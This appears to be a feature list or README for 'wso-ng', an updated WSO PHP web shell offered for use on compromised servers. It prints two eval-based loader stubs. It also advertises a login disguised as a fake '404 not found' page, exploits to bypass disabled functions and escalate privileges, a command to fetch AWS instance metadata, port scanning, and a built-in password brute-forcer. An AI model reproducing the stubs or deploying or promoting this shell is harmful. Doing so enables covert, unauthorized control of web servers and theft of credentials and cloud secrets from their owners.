wso-ng copied to clipboard
The new generation of famous WSO web shell. With perks included
New generation of famous WSO web shell. With perks included
default password is "root"
- can now hook password when loaded via stub
<?php eval(substr(file_get_contents(''), 5)); ?>
<?php $sorrymom = create_function('', "substr(implode('', file('')), 5)");$sorrymom();
and will use it instead of hardcoded one
- all subfile downloads are now cached in /tmp and zipped
- login page show natural site "404 not found" page. Just type password and press Enter, cuz password field hidden offscreen, but focused already.
- new breadcrumps navigation panel. Must be much more usefull.
- all files\dirs are now highlighted as their edit\view rights
- go to file\path right from breadcrumps field
- add fastCGI exploit to auto-elevate & bypass disabled functions, when possible
- add php add-filter exploit to bypass disabled functions and gain console execution, when possible
- ajax interaction now is default
- Ctrl+Enter on any field to Save\Run
- added "Fetch AWS metadata" command to bookmarks
- added hotlink to "Linux Exploit Suggester v2" by default.
- added VirusTotal integration, to autocheck IP reputation.
- added integration, to show neighbors on same IP.
- added ip-info integration to show domains on same server
- added reverse ip check, to show real IP, and not local.
- added memory, cores and load average info to top bar.
- click on IP to copy it
- added list of open ports & sockets to Sec. Info section. Works ever if no console priveleges available, thru fsock.
- added support for phpRedis in Sec. Info section.
- reworked "Userful" section. Works thru limits of open basedir now.
- you can touch files right in file list of file manager now.
- fast copy name\path to clipboard by click.
- neat syntax highlighting everywhere.
- neat PHP code editing with autoindent support.
- default top1000 password list ( in "Bruteforce" section.